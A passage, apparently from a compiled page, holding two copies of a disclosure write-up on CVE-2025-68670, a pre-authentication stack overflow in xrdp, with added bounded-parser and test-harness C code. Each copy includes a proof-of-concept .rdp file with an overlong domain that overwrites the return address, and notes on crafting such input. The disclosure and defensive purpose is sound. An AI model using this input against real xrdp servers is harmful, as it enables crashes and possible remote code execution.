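    const char *sep = strstr(host, "__");
    return sep != NULL ? (size_t)(sep - host) : strlen(host);
}

/* Bytes the page's "pos > 0" branch stores through resultBuffer: pos copied
 * bytes plus one terminator (assumption: g_strncpy writes dest[len] = 0).
 * Returns 0 when that branch is not taken. Above RESULT_MAX is out of bounds. */
static size_t legacy_store_size(const char *domain)
{
    const char *sep;
    if (domain[0] != '_')
        return 0;
    sep = strstr(domain + 1, "__");
    if (sep == NULL || sep == domain + 1)
        return 0; /* the 255-byte branch, which stays in bounds */
    return (size_t)(sep - (domain + 1)) + 1;
}

/* Hypothetical bounded parser: the caller passes the real size of dst. */
static enum parse_status
parse_host_bounded(const char *domain, char *dst, size_t dst_len)
{
    size_t n;
    if (dst == NULL || dst_len == 0)
        return PARSE_TOO_LONG;
    memset(dst, 0, dst_len); /* clear dst_len bytes, not a hard-coded 256 */
    if (domain == NULL || domain[0] != '_')
        return PARSE_NO_HOST;
    n = host_part_len(domain);
    if (n == 0)
        return PARSE_NO_HOST;
    if (n >= dst_len)
        return PARSE_TOO_LONG; /* reject; this example never truncates */
    memcpy(dst, domain + 1, n); /* dst[n] is already '\0' from the memset */
    return PARSE_OK;
}

/* Constructed input: '_' + host_len filler bytes + "__0". */
static void make_domain(char *out, size_t host_len)
{
    out[0] = '_';
    memset(out + 1, 'h', host_len);
    memcpy(out + 1 + host_len, "__0", 4);
}

/* Parse a constructed domain into a buffer followed by guard bytes and
 * report GUARD_DAMAGED if anything was written past the buffer. */
static int check_case(size_t host_len)
{
    struct { char result[RESULT_MAX]; unsigned char guard[16]; } frame;
    unsigned char expect[16];
    char domain[DOMAIN_MAX];
    int status;

    if (host_len > DOMAIN_MAX - 5u)
        return PARSE_TOO_LONG; /* would not fit the 512-byte domain field */
    make_domain(domain, host_len);
    memset(frame.guard, 0xA5, sizeof(frame.guard));
    memset(expect, 0xA5, sizeof(expect));
    status = parse_host_bounded(domain, frame.result, sizeof(frame.result));
    if (memcmp(frame.guard, expect, sizeof(expect)) != 0)
        return GUARD_DAMAGED;
    if (status == PARSE_OK && strlen(frame.result) != host_len)
        return GUARD_DAMAGED;
    return status;
}

int main(void)
{
    static const size_t lens[] = { 15, 255, 256, 300, 507 };
    char domain[DOMAIN_MAX];
    size_t i;

    for (i = 0; i < sizeof(lens) / sizeof(lens[0]); i++)
    {
        make_domain(domain, lens[i]);
        printf("host=%3zu: legacy branch stores %3zu bytes into %u, bounded parser -> %d\n",
               lens[i], legacy_store_size(domain), RESULT_MAX, check_case(lens[i]));
    }
    return 0;
}
```

    A 255-byte host part is the largest that fits; from 256 bytes upward the unbounded branch writes past the buffer, while the bounded parser returns PARSE_TOO_LONG and leaves the guard bytes untouched.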

  8. CVE-2025-68670: discovering an RCE vulnerability in xrdp

    In addition to KasperskyOS-powered solutions, Kaspersky offers various utility software to streamline business operations. For instance, users of Kaspersky Thin Client, an operating system for thin clients, can also purchase Kaspersky USB Redirector, a module that expands the capabilities of the xrdp remote desktop server for Linux. This module enables access to local USB devices, such as flash drives, tokens, smart cards, and printers, within a remote desktop session – all while maintaining connection security.

    We take the security of our products seriously and regularly conduct security assessments. Kaspersky USB Redirector is no exception. Last year, during a security audit of this tool, we discovered a remote code execution vulnerability in the xrdp server, which was assigned the identifier CVE-2025-68670. We reported our findings to the project maintainers, who responded quickly: they fixed the vulnerability in version 0.10.5, backported the patch to versions 0.9.27 and 0.10.4.1, and issued a security bulletin. This post breaks down the details of CVE-2025-68670 and provides recommendations for staying protected.

    Client data transmission via RDP


    Establishing an RDP connection is a complex, multi-stage process where the client and server exchange various settings. In the context of the vulnerability we discovered, we are specifically interested in the Secure Settings Exchange, which occurs immediately before client authentication. At this stage, the client sends protected credentials to the server within a Client Info PDU (protocol data unit with client info): username, password, auto-reconnect cookies, and so on. These data points are bundled into a TS_INFO_PACKET structure and can be represented as Unicode strings up to 512 bytes long, the last of which must be a null terminator. In the xrdp code, this corresponds to the xrdp_client_info structure, which looks as follows:
    struct xrdp_client_info
    {
        [..SNIP..]
        char username[INFO_CLIENT_MAX_CB_LEN];
        char password[INFO_CLIENT_MAX_CB_LEN];
        char domain[INFO_CLIENT_MAX_CB_LEN];
        char program[INFO_CLIENT_MAX_CB_LEN];
        char directory[INFO_CLIENT_MAX_CB_LEN];
        [..SNIP..]
    };
    The value of the INFO_CLIENT_MAX_CB_LEN constant corresponds to the maximum string length and is defined as follows:
    #define INFO_CLIENT_MAX_CB_LEN 512
    When transmitting Unicode data, the client uses the UTF-16 encoding. However, the server converts the data to UTF-8 before saving it.
    if (ts_info_utf16_in( // [1]
            s, len_domain, self->rdp_layer->client_info.domain,
            sizeof(self->rdp_layer->client_info.domain)) != 0) // [2]
    {
        [..SNIP..]
    }
    The size of the buffer for unpacking the domain name in UTF-8 [2] is passed to the ts_info_utf16_in function [1], which implements buffer overflow protection [3].
    static int ts_info_utf16_in(struct stream *s, int src_bytes, char *dst, int dst_len)
    {
        int rv = 0;
        LOG_DEVEL(LOG_LEVEL_TRACE, "ts_info_utf16_in: uni_len %d, dst_len %d", src_bytes, dst_len);
        if (!s_check_rem_and_log(s, src_bytes + 2, "ts_info_utf16_in"))
        {
            rv = 1;
        }
        else
        {
            int term;
            int num_chars = in_utf16_le_fixed_as_utf8(s, src_bytes / 2,
                                                      dst, dst_len);
            if (num_chars > dst_len) // [3]
            {
                LOG(LOG_LEVEL_ERROR, "ts_info_utf16_in: output buffer overflow");
                rv = 1;
            }
            // String should be null-terminated. We haven't read the terminator yet
            in_uint16_le(s, term);
            if (term != 0)
            {
                LOG(LOG_LEVEL_ERROR, "ts_info_utf16_in: bad terminator. Expected 0, got %d", term);
                rv = 1;
            }
        }
        return rv;
    }
    Next, the in_utf16_le_fixed_as_utf8_proc function, where the actual data conversion from UTF-16 to UTF-8 takes place, checks the number of bytes written [4] as well as whether the string is null-terminated [5].
    {
        unsigned int rv = 0;
        char32_t c32;
        char u8str[MAXLEN_UTF8_CHAR];
        unsigned int u8len;
        char *saved_s_end = s->end;

        // Expansion of S_CHECK_REM(s, n*2) using passed-in file and line
    #ifdef USE_DEVEL_STREAMCHECK
        parser_stream_overflow_check(s, n * 2, 0, file, line);
    #endif
        // Temporarily set the stream end pointer to allow us to use
        // s_check_rem() when reading in UTF-16 words
        if (s->end - s->p > (int)(n * 2))
        {
            s->end = s->p + (int)(n * 2);
        }

        while (s_check_rem(s, 2))
        {
            c32 = get_c32_from_stream(s);
            u8len = utf_char32_to_utf8(c32, u8str);
            if (u8len + 1 <= vn) // [4]
            {
                /* Room for this character and a terminator. Add the character */
                unsigned int i;
                for (i = 0 ; i < u8len ; ++i)
                {
                    v[i] = u8str[i];
                }

                vn -= u8len;
                v += u8len;
            }

            else if (vn > 1)
            {
                /* We've skipped a character, but there's more than one byte
                 * remaining in the output buffer. Mark the output buffer as
                 * full so we don't get a smaller character being squeezed into
                 * the remaining space */
                vn = 1;
            }

            rv += u8len;
        }
        // Restore stream to full length
        s->end = saved_s_end;
        if (vn > 0)
        {
            *v = '\0'; // [5]
        }
        ++rv;
        return rv;
    }
    Consequently, up to 512 bytes of input data in UTF-16 are converted into UTF-8 data, which can also reach a size of up to 512 bytes.

    CVE-2025-68670: an RCE vulnerability in xrdp


    The vulnerability exists within the xrdp_wm_parse_domain_information function, which processes the domain name saved on the server in UTF-8. Like the functions described above, this one is called before client authentication, meaning exploitation does not require valid credentials. The call stack below illustrates this.
    xrdp_wm_parse_domain_information(char *originalDomainInfo, int comboMax,
                                     int decode, char *resultBuffer)
    xrdp_login_wnd_create(struct xrdp_wm *self)
    xrdp_wm_init(struct xrdp_wm *self)
    xrdp_wm_login_state_changed(struct xrdp_wm *self)
    xrdp_wm_check_wait_objs(struct xrdp_wm *self)
    xrdp_process_main_loop(struct xrdp_process *self)
    The code snippet where the vulnerable function is called looks like this:
    char resultIP[256]; // [7]
    [..SNIP..]
    combo->item_index = xrdp_wm_parse_domain_information(
                            self->session->client_info->domain, // [6]
                            combo->data_list->count, 1,
                            resultIP /* just a dummy place holder, we ignore */ );
    As you can see, the first argument of the function in line [6] is the domain name up to 512 bytes long. The final argument is the resultIP buffer of 256 bytes (as seen in line [7]). Now, let’s look at exactly what the vulnerable function does with these arguments.
    static int
    xrdp_wm_parse_domain_information(char *originalDomainInfo, int comboMax,
                                     int decode, char *resultBuffer)
    {
        int ret;
        int pos;
        int comboxindex;
        char index[2];

        /* If the first char in the domain name is '_' we use the domain name as IP*/
        ret = 0; /* default return value */
        /* resultBuffer assumed to be 256 chars */
        g_memset(resultBuffer, 0, 256);
        if (originalDomainInfo[0] == '_') // [8]
        {
            /* we try to locate a number indicating what combobox index the user
             * prefer the information is loaded from domain field, from the client
             * We must use valid chars in the domain name.
             * Underscore is a valid name in the domain.
             * Invalid chars are ignored in microsoft client therefore we use '_'
             * again. this sec '__' contains the split for index.*/
            pos = g_pos(&originalDomainInfo[1], "__"); // [9]
            if (pos > 0)
            {
                /* an index is found we try to use it */
                LOG(LOG_LEVEL_DEBUG, "domain contains index char __");
                if (decode)
                {
                    [..SNIP..]
                }
                /* pos limit the String to only contain the IP */
                g_strncpy(resultBuffer, &originalDomainInfo[1], pos); // [10]
            }
            else
            {
                LOG(LOG_LEVEL_DEBUG, "domain does not contain _");
                g_strncpy(resultBuffer, &originalDomainInfo[1], 255);
            }
        }
        return ret;
    }
    As seen in the code, if the first character of the domain name is an underscore (line [8]), a portion of the domain name – starting from the second character and ending with the double underscore (“__”) – is written into the resultIP buffer (line [9]). Since the domain name can be up to 512 bytes long, it may not fit into the buffer even if it’s technically well-formed (line [10]). Consequently, the overflow data will be written to the thread stack, potentially modifying the return address. If an attacker crafts a domain name that overflows the stack buffer and replaces the return address with a value they control, execution flow will shift according to the attacker’s intent upon returning from the vulnerable function, allowing for arbitrary code execution within the context of the compromised process (in this case, the xrdp server).

    To exploit this vulnerability, the attacker simply needs to specify a domain name that, after being converted to UTF-8, contains more than 256 bytes between the initial “_” and the subsequent “__”. Given that the conversion follows specific rules easily found online, this is a straightforward task: one can simply take advantage of the fact that the length of the same string can vary between UTF-16 and UTF-8. In short, this involves avoiding ASCII and certain other characters that may take up more space in UTF-16 than in UTF-8, while also being careful not to abuse characters that expand significantly after conversion. If the resulting UTF-8 domain name exceeds the 512-byte limit, a conversion error will occur.

    PoC


    As a PoC for the discovered vulnerability, we created the following RDP file containing the RDP server’s IP address and a long domain name designed to trigger a buffer overflow. In the domain name, we used a specific number of K (U+041A) characters to overwrite the return address with the string “AAAAAAAA”. The contents of the RDP file are shown below:
    alternate full address:s:172.22.118.7
    full address:s:172.22.118.7
    domain:s:_veryveryveryverKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKeryveryveryveryveryveryveryveryveryveryveryveryveryveryveryveryveryveryveryveaaaaaaaaryveryveryveryveryveryveryveryveryveryveryveryverylongdoAAAAAAAA__0
    username:s:testuser
    When you open this file, the mstsc.exe process connects to the specified server. The server processes the data in the file and attempts to write the domain name into the buffer, which results in a buffer overflow and the overwriting of the return address. If you look at the xrdp memory dump at the time of the crash, you can see that both the buffer and the return address have been overwritten. The application terminates during the stack canary check. The example below was captured using the gdb debugger.

        gef➤ bt
        #0 __pthread_kill_implementation (no_tid=0x0, signo=0x6, threadid=0x7adb2dc71740) at ./nptl/pthread_kill.c:44
        #1 __pthread_kill_internal (signo=0x6, threadid=0x7adb2dc71740) at ./nptl/pthread_kill.c:78
        #2 __GI___pthread_kill (threadid=0x7adb2dc71740, signo=signo@entry=0x6) at ./nptl/pthread_kill.c:89
        #3 0x00007adb2da42476 in __GI_raise (sig=sig@entry=0x6) at ../sysdeps/posix/raise.c:26
        #4 0x00007adb2da287f3 in __GI_abort () at ./stdlib/abort.c:79
        #5 0x00007adb2da89677 in __libc_message (action=action@entry=do_abort, fmt=fmt@entry=0x7adb2dbdb92e "*** %s ***: terminated\n") at ../sysdeps/posix/libc_fatal.c:156
        #6 0x00007adb2db3660a in __GI___fortify_fail (msg=msg@entry=0x7adb2dbdb916 "stack smashing detected") at ./debug/fortify_fail.c:26
        #7 0x00007adb2db365d6 in __stack_chk_fail () at ./debug/stack_chk_fail.c:24
        #8 0x000063654a2e5ad5 in ?? ()
        #9 0x4141414141414141 in ?? ()
        #10 0x00007adb00000a00 in ?? ()
        #11 0x0000000000050004 in ?? ()
        #12 0x00007fff91732220 in ?? ()
        #13 0x000000000000030a in ?? ()
        #14 0xfffffffffffffff8 in ?? ()
        #15 0x000000052dc71740 in ?? ()
        #16 0x3030305f70647278 in ?? ()
        #17 0x616d5f6130333030 in ?? ()
        #18 0x00636e79735f6e69 in ?? ()
        #19 0x0000000000000000 in ?? ()

    Protection against vulnerability exploitation


    It is worth noting that the vulnerable function can be protected by a stack canary via compiler settings. In most compilers, this option is enabled by default, which prevents an attacker from simply overwriting the return address and executing a ROP chain. To successfully exploit the vulnerability, the attacker would first need to obtain the canary value.

    The vulnerable function is also referenced by the xrdp_wm_show_edits function; however, even in that case, if the code is compiled with secure settings (using stack canaries), the most trivial exploitation scenario remains unfeasible.

    Nevertheless, a stack canary is not a panacea. An attacker could potentially leak or guess its value, allowing them to overwrite the buffer and the return address while leaving the canary itself unchanged. In the security bulletin dedicated to CVE-2025-68670, the xrdp maintainers advise against relying solely on stack canaries when using the project.

    Vulnerability remediation timeline


    • 12/05/2025: we submitted the vulnerability report via github.com/neutrinolabs/xrdp/s…
    • 12/05/2025: the project maintainers immediately confirmed receipt of the report and stated they would review it shortly.
    • 12/15/2025: investigation and prioritization of the vulnerability began.
    • 12/18/2025: the maintainers confirmed the vulnerability and began developing a patch.
    • 12/24/2025: the vulnerability was assigned the identifier CVE-2025-68670.
    • 01/27/2026: the patch was merged into the project’s main branch.


    Conclusion


    Taking a responsible approach to code not only makes our own products more solid but also enhances popular open-source projects. We have previously shared how security assessments of KasperskyOS-based solutions – such as Kaspersky Thin Client and Kaspersky IoT Secure Gateway – led to the discovery of several vulnerabilities in Suricata and FreeRDP, which project maintainers quickly patched. CVE-2025-68670 is yet another one of those stories.

    However, discovering a vulnerability is only half the battle. We would like to thank the xrdp maintainers for their rapid response to our report, for fixing the vulnerability, and for issuing a security bulletin detailing the issue and risk mitigation options.

    securelist.com/cve-2025-68670/…

  9. CVE-2025-68670: discovering an RCE vulnerability in xrdp

    In addition to KasperskyOS-powered solutions, Kaspersky offers various utility software to streamline business operations. For instance, users of Kaspersky Thin Client, an operating system for thin clients, can also purchase Kaspersky USB Redirector, a module that expands the capabilities of the xrdp remote desktop server for Linux. This module enables access to local USB devices, such as flash drives, tokens, smart cards, and printers, within a remote desktop session – all while maintaining connection security.

    We take the security of our products seriously and regularly conduct security assessments. Kaspersky USB Redirector is no exception. Last year, during a security audit of this tool, we discovered a remote code execution vulnerability in the xrdp server, which was assigned the identifier CVE-2025-68670. We reported our findings to the project maintainers, who responded quickly: they fixed the vulnerability in version 0.10.5, backported the patch to versions 0.9.27 and 0.10.4.1, and issued a security bulletin. This post breaks down the details of CVE-2025-68670 and provides recommendations for staying protected.

    Client data transmission via RDP


    Establishing an RDP connection is a complex, multi-stage process where the client and server exchange various settings. In the context of the vulnerability we discovered, we are specifically interested in the Secure Settings Exchange, which occurs immediately before client authentication. At this stage, the client sends protected credentials to the server within a Client Info PDU (protocol data unit with client info): username, password, auto-reconnect cookies, and so on. These data points are bundled into a TS_INFO_PACKET structure and can be represented as Unicode strings up to 512 bytes long, the last of which must be a null terminator. In the xrdp code, this corresponds to the xrdp_client_info structure, which looks as follows:

        struct xrdp_client_info
        {
            [..SNIP..]
            char username[INFO_CLIENT_MAX_CB_LEN];
            char password[INFO_CLIENT_MAX_CB_LEN];
            char domain[INFO_CLIENT_MAX_CB_LEN];
            char program[INFO_CLIENT_MAX_CB_LEN];
            char directory[INFO_CLIENT_MAX_CB_LEN];
            [..SNIP..]
        };

    The value of the INFO_CLIENT_MAX_CB_LEN constant corresponds to the maximum string length and is defined as follows:

        #define INFO_CLIENT_MAX_CB_LEN 512

    When transmitting Unicode data, the client uses the UTF-16 encoding. However, the server converts the data to UTF-8 before saving it.

        if (ts_info_utf16_in( // [1]
                s, len_domain, self->rdp_layer->client_info.domain,
                sizeof(self->rdp_layer->client_info.domain)) != 0) // [2]
        {
            [..SNIP..]
        }

    The size of the buffer for unpacking the domain name in UTF-8 [2] is passed to the ts_info_utf16_in function [1], which implements buffer overflow protection [3].

        static int ts_info_utf16_in(struct stream *s, int src_bytes, char *dst, int dst_len)
        {
            int rv = 0;
            LOG_DEVEL(LOG_LEVEL_TRACE, "ts_info_utf16_in: uni_len %d, dst_len %d", src_bytes, dst_len);
            if (!s_check_rem_and_log(s, src_bytes + 2, "ts_info_utf16_in"))
            {
                rv = 1;
            }
            else
            {
                int term;
                int num_chars = in_utf16_le_fixed_as_utf8(s, src_bytes / 2,
                                                          dst, dst_len);
                if (num_chars > dst_len) // [3]
                {
                    LOG(LOG_LEVEL_ERROR, "ts_info_utf16_in: output buffer overflow");
                    rv = 1;
                }
                // String should be null-terminated. We haven't read the terminator yet
                in_uint16_le(s, term);
                if (term != 0)
                {
                    LOG(LOG_LEVEL_ERROR, "ts_info_utf16_in: bad terminator. Expected 0, got %d", term);
                    rv = 1;
                }
            }
            return rv;
        }

    Next, the in_utf16_le_fixed_as_utf8_proc function, where the actual data conversion from UTF-16 to UTF-8 takes place, checks the number of bytes written [4] as well as whether the string is null-terminated [5].

        {
            unsigned int rv = 0;
            char32_t c32;
            char u8str[MAXLEN_UTF8_CHAR];
            unsigned int u8len;
            char *saved_s_end = s->end;

            // Expansion of S_CHECK_REM(s, n*2) using passed-in file and line
        #ifdef USE_DEVEL_STREAMCHECK
            parser_stream_overflow_check(s, n * 2, 0, file, line);
        #endif
            // Temporarily set the stream end pointer to allow us to use
            // s_check_rem() when reading in UTF-16 words
            if (s->end - s->p > (int)(n * 2))
            {
                s->end = s->p + (int)(n * 2);
            }

            while (s_check_rem(s, 2))
            {
                c32 = get_c32_from_stream(s);
                u8len = utf_char32_to_utf8(c32, u8str);
                if (u8len + 1 <= vn) // [4]
                {
                    /* Room for this character and a terminator. Add the character */
                    unsigned int i;
                    for (i = 0 ; i < u8len ; ++i)
                    {
                        v[i] = u8str[i];
                    }

                    vn -= u8len;
                    v += u8len;
                }
                else if (vn > 1)
                {
                    /* We've skipped a character, but there's more than one byte
                     * remaining in the output buffer. Mark the output buffer as
                     * full so we don't get a smaller character being squeezed into
                     * the remaining space */
                    vn = 1;
                }

                rv += u8len;
            }
            // Restore stream to full length
            s->end = saved_s_end;
            if (vn > 0)
            {
                *v = '\0'; // [5]
            }
            ++rv;
            return rv;
        }

    Consequently, up to 512 bytes of input data in UTF-16 are converted into UTF-8 data, which can also reach a size of up to 512 bytes.
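To make the size relationship concrete, here is a standalone sketch of a bounded UTF-16LE to UTF-8 conversion that uses the same return convention as the routine above (bytes needed, terminator included). It is an added example, not xrdp code: the function names are hypothetical, the inputs are constructed, and replacing an unpaired surrogate with U+FFFD is a choice made here.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define INFO_CLIENT_MAX_CB_LEN 512 /* field size, from the page */

/* Encode one code point as UTF-8; returns the byte count (1 to 4). */
static unsigned int cp_to_utf8(uint32_t cp, char *out)
{
    unsigned int len = cp < 0x80 ? 1 : cp < 0x800 ? 2 : cp < 0x10000 ? 3 : 4;
    static const unsigned char lead[5] = { 0, 0x00, 0xC0, 0xE0, 0xF0 };
    unsigned int i;

    /* Fill continuation bytes from the end, six bits at a time */
    for (i = len - 1; i > 0; --i) {
        out[i] = (char)(0x80 | (cp & 0x3F));
        cp >>= 6;
    }
    out[0] = (char)(lead[len] | cp);
    return len;
}

/* Read the i-th little-endian UTF-16 code unit. */
static uint32_t unit_at(const unsigned char *src, size_t i)
{
    return (uint32_t)src[2 * i] | ((uint32_t)src[2 * i + 1] << 8);
}

/*
 * Convert n_units UTF-16LE code units into dst (dst_len bytes). The return
 * value is the number of UTF-8 bytes the whole input needs, terminator
 * included, even when not all of it fit, so the caller can detect overflow.
 */
static unsigned int utf16le_to_utf8_bounded(const unsigned char *src,
                                            size_t n_units, char *dst,
                                            unsigned int dst_len)
{
    unsigned int needed = 0;
    size_t i = 0;

    while (i < n_units) {
        char u8[4];
        unsigned int len;
        uint32_t cp = unit_at(src, i++);

        if (cp >= 0xD800 && cp <= 0xDBFF && i < n_units &&
            unit_at(src, i) >= 0xDC00 && unit_at(src, i) <= 0xDFFF) {
            /* Valid surrogate pair: combine into one code point */
            cp = 0x10000 + ((cp - 0xD800) << 10) + (unit_at(src, i) - 0xDC00);
            ++i;
        } else if (cp >= 0xD800 && cp <= 0xDFFF) {
            cp = 0xFFFD; /* unpaired surrogate: substituted (choice made here) */
        }

        len = cp_to_utf8(cp, u8);
        if (len + 1 <= dst_len) {
            /* Room for this character and a terminator */
            memcpy(dst, u8, len);
            dst += len;
            dst_len -= len;
        } else if (dst_len > 1) {
            dst_len = 1; /* mark full: no shorter character squeezed in later */
        }
        needed += len;
    }
    if (dst_len > 0) {
        *dst = '\0';
    }
    return needed + 1;
}

static char field[INFO_CLIENT_MAX_CB_LEN]; /* stands in for the domain field */

/* Constructed input: n_units copies of one BMP code unit, converted into field. */
static unsigned int convert_run(uint16_t unit, size_t n_units)
{
    unsigned char src[INFO_CLIENT_MAX_CB_LEN];
    size_t i;

    if (n_units > sizeof(src) / 2) n_units = sizeof(src) / 2;
    for (i = 0; i < n_units; ++i) {
        src[2 * i] = (unsigned char)(unit & 0xFF);
        src[2 * i + 1] = (unsigned char)(unit >> 8);
    }
    return utf16le_to_utf8_bounded(src, n_units, field, sizeof(field));
}

int main(void)
{
    /* 255 copies each of 'a', U+041A and U+20AC (constructed inputs) */
    printf("%u %u %u\n", convert_run(0x0061, 255), convert_run(0x041A, 255),
           convert_run(0x20AC, 255));
    return 0;
}
```

A one-byte, two-byte and three-byte character class give three different outcomes against the 512-byte field, and only the last is caught by the caller's `num_chars > dst_len` check. Any code that later consumes the stored string therefore has to size for INFO_CLIENT_MAX_CB_LEN, not for a smaller assumed length.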

    CVE-2025-68670: an RCE vulnerability in xrdp


    The vulnerability exists within the xrdp_wm_parse_domain_information function, which processes the domain name saved on the server in UTF-8. Like the functions described above, this one is called before client authentication, meaning exploitation does not require valid credentials. The call stack below illustrates this.

        xrdp_wm_parse_domain_information(char *originalDomainInfo, int comboMax,
                                         int decode, char *resultBuffer)
        xrdp_login_wnd_create(struct xrdp_wm *self)
        xrdp_wm_init(struct xrdp_wm *self)
        xrdp_wm_login_state_changed(struct xrdp_wm *self)
        xrdp_wm_check_wait_objs(struct xrdp_wm *self)
        xrdp_process_main_loop(struct xrdp_process *self)

    The code snippet where the vulnerable function is called looks like this:

        char resultIP[256]; // [7]
        [..SNIP..]
        combo->item_index = xrdp_wm_parse_domain_information(
                                self->session->client_info->domain, // [6]
                                combo->data_list->count, 1,
                                resultIP /* just a dummy place holder, we ignore */);

    As you can see, the first argument of the function in line [6] is the domain name up to 512 bytes long. The final argument is the resultIP buffer of 256 bytes (as seen in line [7]). Now, let’s look at exactly what the vulnerable function does with these arguments.

        static int
        xrdp_wm_parse_domain_information(char *originalDomainInfo, int comboMax,
                                         int decode, char *resultBuffer)
        {
            int ret;
            int pos;
            int comboxindex;
            char index[2];

            /* If the first char in the domain name is '_' we use the domain name as IP*/
            ret = 0; /* default return value */
            /* resultBuffer assumed to be 256 chars */
            g_memset(resultBuffer, 0, 256);
            if (originalDomainInfo[0] == '_') // [8]
            {
                /* we try to locate a number indicating what combobox index the user
                 * prefer the information is loaded from domain field, from the client
                 * We must use valid chars in the domain name.
                 * Underscore is a valid name in the domain.
                 * Invalid chars are ignored in microsoft client therefore we use '_'
                 * again. this sec '__' contains the split for index.*/
                pos = g_pos(&originalDomainInfo[1], "__"); // [9]
                if (pos > 0)
                {
                    /* an index is found we try to use it */
                    LOG(LOG_LEVEL_DEBUG, "domain contains index char __");
                    if (decode)
                    {
                        [..SNIP..]
                    }
                    /* pos limit the String to only contain the IP */
                    g_strncpy(resultBuffer, &originalDomainInfo[1], pos); // [10]
                }
                else
                {
                    LOG(LOG_LEVEL_DEBUG, "domain does not contain _");
                    g_strncpy(resultBuffer, &originalDomainInfo[1], 255);
                }
            }
            return ret;
        }

    As seen in the code, if the first character of the domain name is an underscore (line [8]), a portion of the domain name – starting from the second character and ending with the double underscore (“__”) – is written into the resultIP buffer (line [9]). Since the domain name can be up to 512 bytes long, it may not fit into the buffer even if it’s technically well-formed (line [10]). Consequently, the overflow data will be written to the thread stack, potentially modifying the return address. If an attacker crafts a domain name that overflows the stack buffer and replaces the return address with a value they control, execution flow will shift according to the attacker’s intent upon returning from the vulnerable function, allowing for arbitrary code execution within the context of the compromised process (in this case, the xrdp server).

    To exploit this vulnerability, the attacker simply needs to specify a domain name that, after being converted to UTF-8, contains more than 256 bytes between the initial “_” and the subsequent “__”. Given that the conversion follows specific rules easily found online, this is a straightforward task: one can simply take advantage of the fact that the length of the same string can vary between UTF-16 and UTF-8. In short, this involves avoiding ASCII and certain other characters that may take up more space in UTF-16 than in UTF-8, while also being careful not to abuse characters that expand significantly after conversion. If the resulting UTF-8 domain name exceeds the 512-byte limit, a conversion error will occur.

    PoC


    As a PoC for the discovered vulnerability, we created the following RDP file containing the RDP server’s IP address and a long domain name designed to trigger a buffer overflow. In the domain name, we used a specific number of K (U+041A) characters to overwrite the return address with the string “AAAAAAAA”. The contents of the RDP file are shown below:

        alternate full address:s:172.22.118.7
        full address:s:172.22.118.7
        domain:s:_veryveryveryverKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKeryveryveryveryveryveryveryveryveryveryveryveryveryveryveryveryveryveryveryveaaaaaaaaryveryveryveryveryveryveryveryveryveryveryveryverylongdoAAAAAAAA__0
        username:s:testuser

    When you open this file, the mstsc.exe process connects to the specified server. The server processes the data in the file and attempts to write the domain name into the buffer, which results in a buffer overflow and the overwriting of the return address. If you look at the xrdp memory dump at the time of the crash, you can see that both the buffer and the return address have been overwritten. The application terminates during the stack canary check. The example below was captured using the gdb debugger.

        gef➤ bt
        #0 __pthread_kill_implementation (no_tid=0x0, signo=0x6, threadid=0x7adb2dc71740) at ./nptl/pthread_kill.c:44
        #1 __pthread_kill_internal (signo=0x6, threadid=0x7adb2dc71740) at ./nptl/pthread_kill.c:78
        #2 __GI___pthread_kill (threadid=0x7adb2dc71740, signo=signo@entry=0x6) at ./nptl/pthread_kill.c:89
        #3 0x00007adb2da42476 in __GI_raise (sig=sig@entry=0x6) at ../sysdeps/posix/raise.c:26
        #4 0x00007adb2da287f3 in __GI_abort () at ./stdlib/abort.c:79
        #5 0x00007adb2da89677 in __libc_message (action=action@entry=do_abort, fmt=fmt@entry=0x7adb2dbdb92e "*** %s ***: terminated\n") at ../sysdeps/posix/libc_fatal.c:156
        #6 0x00007adb2db3660a in __GI___fortify_fail (msg=msg@entry=0x7adb2dbdb916 "stack smashing detected") at ./debug/fortify_fail.c:26
        #7 0x00007adb2db365d6 in __stack_chk_fail () at ./debug/stack_chk_fail.c:24
        #8 0x000063654a2e5ad5 in ?? ()
        #9 0x4141414141414141 in ?? ()
        #10 0x00007adb00000a00 in ?? ()
        #11 0x0000000000050004 in ?? ()
        #12 0x00007fff91732220 in ?? ()
        #13 0x000000000000030a in ?? ()
        #14 0xfffffffffffffff8 in ?? ()
        #15 0x000000052dc71740 in ?? ()
        #16 0x3030305f70647278 in ?? ()
        #17 0x616d5f6130333030 in ?? ()
        #18 0x00636e79735f6e69 in ?? ()
        #19 0x0000000000000000 in ?? ()

    Protection against vulnerability exploitation


    It is worth noting that the vulnerable function can be protected by a stack canary via compiler settings. In most compilers, this option is enabled by default, which prevents an attacker from simply overwriting the return address and executing a ROP chain. To successfully exploit the vulnerability, the attacker would first need to obtain the canary value.

    The vulnerable function is also referenced by the xrdp_wm_show_edits function; however, even in that case, if the code is compiled with secure settings (using stack canaries), the most trivial exploitation scenario remains unfeasible.

    Nevertheless, a stack canary is not a panacea. An attacker could potentially leak or guess its value, allowing them to overwrite the buffer and the return address while leaving the canary itself unchanged. In the security bulletin dedicated to CVE-2025-68670, the xrdp maintainers advise against relying solely on stack canaries when using the project.
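The root cause is a copy whose length comes from the input (`pos`) while the destination size is only assumed. The sketch below is an added example, not the xrdp patch and not code from the original article: it shows a bounds-checked variant that takes the destination size explicitly and rejects a segment that does not fit. The function name, status codes and guard-byte harness are hypothetical, standard C library calls stand in for xrdp's g_* helpers, and the combobox index handling that the page elides is left out.

```c
#include <stdio.h>
#include <string.h>

#define INFO_CLIENT_MAX_CB_LEN 512 /* domain field size, from the page */
#define RESULT_BUF_LEN 256         /* size of resultIP, from the page */

/* Status codes: hypothetical names chosen for this example */
enum { DOMAIN_NO_PREFIX = 0, DOMAIN_OK = 1, DOMAIN_TOO_LONG = -1,
       GUARD_DAMAGED = -2 };

/*
 * Copy the text between the leading '_' and the first "__" (or the rest of
 * the string when there is no "__") into result. The destination size is an
 * explicit parameter, and a segment that does not fit is rejected instead
 * of being copied or silently truncated.
 */
static int parse_domain_bounded(const char *domain, char *result,
                                size_t result_len)
{
    const char *start;
    const char *sep;
    size_t seg_len;

    memset(result, 0, result_len);
    if (domain[0] != '_') {
        return DOMAIN_NO_PREFIX;
    }

    start = domain + 1;
    sep = strstr(start, "__");
    /* Same rule as the original: a "__" at offset 0 does not count */
    seg_len = (sep != NULL && sep > start) ? (size_t)(sep - start)
                                            : strlen(start);

    /* Need room for seg_len bytes plus the terminator */
    if (seg_len + 1 > result_len) {
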